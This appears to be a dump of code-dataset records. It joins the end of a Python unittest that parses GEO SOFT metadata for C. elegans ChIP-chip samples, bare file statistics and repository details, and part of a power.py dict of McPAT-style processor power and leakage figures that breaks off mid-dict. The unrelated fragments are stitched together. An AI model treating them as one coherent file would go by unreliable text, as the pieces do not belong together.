!Sample_growth_protocol_ch1 Worm_L3_growth_and_harvest_vPK1 Worm_L3_growth_and_harvest_vPK1. About 2-7 million of worms are bleached and then hatched in M9 for 24-42 hrs. About 100 embryos are seeded onto the plate to test for contamination and hatching efficiency. Remaining hatched L1 larvae are inoculated in a proper volume of liquid culture. Next day when larvae reach the L3 stage they are cleaned by M9 washes and sucrose gradient and collected by freezing in liquid nitrogen. Just before collection DIC pictures are taken and about 50ul of worms are stained for DAPI to assess the stage.
!Sample_growth_protocol_ch2 Worm_L3_growth_and_harvest_vPK1 Worm_L3_growth_and_harvest_vPK1. About 2-7 million of worms are bleached and then hatched in M9 for 24-42 hrs. About 100 embryos are seeded onto the plate to test for contamination and hatching efficiency. Remaining hatched L1 larvae are inoculated in a proper volume of liquid culture. Next day when larvae reach the L3 stage they are cleaned by M9 washes and sucrose gradient and collected by freezing in liquid nitrogen. Just before collection DIC pictures are taken and about 50ul of worms are stained for DAPI to assess the stage.
!Sample_growth_protocol_comment_ch1
!Sample_growth_protocol_comment_ch2
!Sample_hyb_protocol ChIP-chip_label_hyb_nimblegen_v1 ChIP-chip_label_hyb_nimblegen_v1. DNA was labeled and hybridized to C. elegans tiling array by Roche NimbleGen according to the protocol described in chapter 3 and 4 of the NimbleGen Arrays User?s Guide ChIP-chip Analysis, Version 3.1, 27 May 2008. Briefly, Amplified IP or input DNA was either labeled with Cy5 or Cy3 in the presence of Klenow fragment. The reaction was stopped by the addition of EDTA. Labeled DNA was recovered by isopropanol precipitation, and dried. The labeled DNA was hybridized to C. elegans tiling array for 16 - 20 hours at 42?C.
!Sample_label_ch1 Cy3 Cy3
!Sample_label_ch2 Cy5 Cy5
!Sample_molecule_ch1 genomic DNA genomic DNA
!Sample_molecule_ch2 genomic DNA genomic DNA
!Sample_organism_ch1 Caenorhabditis elegans Caenorhabditis elegans
!Sample_organism_ch2 Caenorhabditis elegans Caenorhabditis elegans
!Sample_platform_id
!Sample_scan_protocol ChIP-chip_scanning_nimblegen_v1 ChIP-chip_scanning_nimblegen_v1. Array scanning and raw data extraction were performed at Roche NimbleGen, according to the protocol described in chapter 5 and 6 of the NimbleGen Arrays User?s Guide ChIP-chip Analysis, Version 3.1, 27 May 2008. Briefly, array signal was scanned by using a GenePix 4000B Scanner with associated software and saved as .tif files of the 532nm and 635nm images individually. Raw signal intensities of the images were extracted and saved as .pair files by using NimbleScan software according to the NimbleScan v2.4 User?s Guide.
!Sample_source_name_ch1
!Sample_source_name_ch2
!Sample_title AB1791_H3_N2_L3_1LM
!Sample_treatment_protocol_ch1 Worm_L3_extraction_vPK1 Worm_L3_extraction_vPK1. Worms are frozen, ground, and crosslinked for 10 minutes in 1% formaldehyde. Later, washed pellets are resuspended in FA buffer and subjected to sonication in Bioruptor (14 pulses of 30 seconds with 1 minute rests in between). Extracts are then spun down and soluble fraction is stored for quality tests and future ChIP.
!Sample_treatment_protocol_ch2 Worm_L3_extraction_vPK1 Worm_L3_extraction_vPK1. Worms are frozen, ground, and crosslinked for 10 minutes in 1% formaldehyde. Later, washed pellets are resuspended in FA buffer and subjected to sonication in Bioruptor (14 pulses of 30 seconds with 1 minute rests in between). Extracts are then spun down and soluble fraction is stored for quality tests and future ChIP.
!Sample_treatment_protocol_comment_ch1
!Sample_treatment_protocol_comment_ch2
^SAMPLE AB1791_H3_N2_L3_1LM
"""
def test_parseSOFT (self):
entities = SOFT.parsestring(self.softstring)
self.assertEqual(entities[0].entity_dict["SAMPLE"],"AB1791_H3_GLP1TS_AD_1_EVERETT")
self.assertEqual(entities[1].entity_dict["SAMPLE"],"AB1791_H3_N2_L3_1LM")
if __name__ == '__main__':
unittest.main()
| 166.126316
| 1,051
| 0.824293
| 2,613
| 15,782
| 4.822426
| 0.197857
| 0.015237
| 0.017142
| 0.013967
| 0.857392
| 0.851837
| 0.839695
| 0.83287
| 0.829934
| 0.829934
| 0
| 0.039528
| 0.140793
| 15,782
| 94
| 1,052
| 167.893617
| 0.889749
| 0.001267
| 0
| 0.636364
| 0
| 0.25
| 0.975319
| 0.198591
| 0
| 0
| 0
| 0
| 0.022727
| 1
| 0.022727
| false
| 0
| 0.022727
| 0
| 0.056818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4f65cfe326a32b0ca9a64851895411c4587170eb
| 68,590
|
py
|
Python
|
benchmarks/SimResults/combinations_spec_heteroFair/oldstuff/cmp_perlbenchgamessbzip2calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_heteroFair/oldstuff/cmp_perlbenchgamessbzip2calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_heteroFair/oldstuff/cmp_perlbenchgamessbzip2calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.110078,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.289148,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.557261,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.522999,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.905645,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.519413,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.94806,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.431528,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.75523,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.105279,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0189591,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.179822,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.140214,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.285101,
'Execution Unit/Register Files/Runtime Dynamic': 0.159174,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.464681,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.0814,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.88316,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00331399,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00331399,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00290087,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00113084,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00201419,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.011543,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0312603,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.134792,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.440489,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.457813,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.0759,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0807418,
'L2/Runtime Dynamic': 0.0153871,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.99783,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.82083,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.121668,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.121668,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.57471,
'Load Store Unit/Runtime Dynamic': 2.54253,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.300012,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.600024,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.106475,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.107492,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0727906,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.742569,
'Memory Management Unit/Runtime Dynamic': 0.180283,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 26.6837,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.367293,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.031163,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.265767,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.664223,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 8.36148,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0364225,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.231296,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.167096,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.247957,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.399945,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.201879,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.84978,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.257973,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.63915,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0315681,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0104004,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0900475,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0769175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.121616,
'Execution Unit/Register Files/Runtime Dynamic': 0.0873179,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.198813,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.518096,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.09187,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00181785,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00181785,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00162371,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000650641,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00110493,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00636433,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0159872,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
